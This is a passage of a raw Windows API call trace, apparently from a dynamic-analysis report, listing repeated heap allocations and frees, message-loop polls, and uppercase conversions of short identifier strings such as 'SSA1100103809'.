RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0208.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0208.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0208.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0208.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0208.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0208.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0208.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.620] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.620] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0208.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa858 [0208.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.620] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0208.621] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0208.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0208.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0208.621] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0208.621] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0208.621] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0208.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0208.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c98 [0208.621] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0208.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.622] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0208.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0208.622] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0208.622] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c98 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0208.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0208.623] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0208.623] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0208.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.623] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0208.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741f0 [0208.624] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0208.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.624] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0208.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0208.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0208.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0208.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.624] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.624] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.625] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741f0 | out: hHeap=0x2af0000) returned 1 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0208.625] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.625] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.625] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0208.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0208.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0208.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0208.626] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0208.627] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0208.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.627] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0208.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0208.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0208.627] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0208.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0208.628] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0208.628] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0208.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0208.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0208.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0208.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0208.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0208.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0208.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0208.629] RtlAllocateHeap 